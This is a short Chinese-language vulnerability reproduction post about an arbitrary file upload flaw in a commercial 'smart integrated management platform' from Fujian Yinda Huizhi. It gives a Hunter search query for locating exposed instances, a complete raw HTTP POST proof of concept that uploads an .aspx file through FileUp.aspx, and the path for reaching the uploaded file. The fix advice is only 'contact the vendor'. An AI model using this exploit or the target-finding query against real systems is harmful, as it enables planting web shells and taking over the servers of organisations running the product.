【漏洞复现】银达汇智智慧综合管理平台任意文件上传漏洞

Nx01 产品简介

? ? ? ? 福建银达汇智信息科技股份有限公司成立于2009年，位于福建省福州市，是一家以从事软件和信息技术服务业为主的企业。

Nx02 漏洞描述

????????银达汇智智慧综合管理平台 FileUpPage 存在任意文件上传漏洞，攻击者通过漏洞可上传任意文件至服务器。

Nx03 产品主页

hunter-query: "汇智信息" && title=="智慧综合管理平台登入"

Nx04 漏洞复现

POC：

POST /Module/FileUpPage/FileUp.aspx?orgid=1&type=NNewsContent HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: identity
Content-Length: 337
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9

--62907949903a4c499178971c9dab4ad9
Content-Disposition: form-data; name="Filedata"; filename="abc.aspx"
Content-Type: image/jpeg

123
--62907949903a4c499178971c9dab4ad9--

拼接URL访问上传文件。

/imgnews/imgcontent/1/xxxxxx.aspx

Nx05 修复建议

建议联系软件厂商进行处理。